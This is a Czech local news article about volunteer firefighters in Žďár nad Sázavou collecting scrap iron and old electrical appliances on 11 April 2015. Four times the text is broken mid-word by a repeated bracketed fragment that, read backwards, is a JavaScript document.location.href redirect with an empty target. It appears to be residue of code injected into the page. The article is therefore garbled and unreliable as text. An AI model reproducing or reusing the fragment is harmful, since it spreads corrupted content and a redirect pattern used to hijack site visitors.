Rainbow page separator

Hasiči ze zámku budou v sobotu svážet železný odpad

Středa, 8. dubna 2015

Santiniho ulice, Zámek Žďár nad Sázavou

Žďár nad Sázavou / Sběr železného odpadu uspořádají v sobotu 11. dubna „zámečtí“ dobrovolní hasiči. Uskuteční se v době od půl osmé do třinácti hodin na území Žďáru. Sběr železa bude rozšířen o svoz vyřazených elektrospotřebičů, jako jsou například chladničky, mrazničky, televizory, rádia, moni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory, počítače, mikrovlnné trouby, sporáky, pračky, myčky, sušičky, elektrická [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topidla a nářadí, vysavače a další domácí elektrické či bateriové spotřebiče.
Naopak se však vybírat nebude klasický nebezpečný odpad, do něhož se počítají kupříkladu žárovky, zářivky, výbojky, barvy, laky, náplně z tiskáren a jiný běžný nekovový odpad z domácností.
Hasiči doporučují, aby lidé železný odpad shromáždili před svým domem nejlépe až v sobotu po sedmé hodině, a pokud [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude možné, nechali ho na svém pozemku za branou, čímž se zabrání jeho případnému zcizení jinými skupinami osob, které se společně se žďárskými hasiči na svozu nepodílejí.
Objemný či těžký odpad hasiči ze sklepů, půd či garáží snesou sami, je ale nutné je o té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to eventualitě předem telefonicky informovat.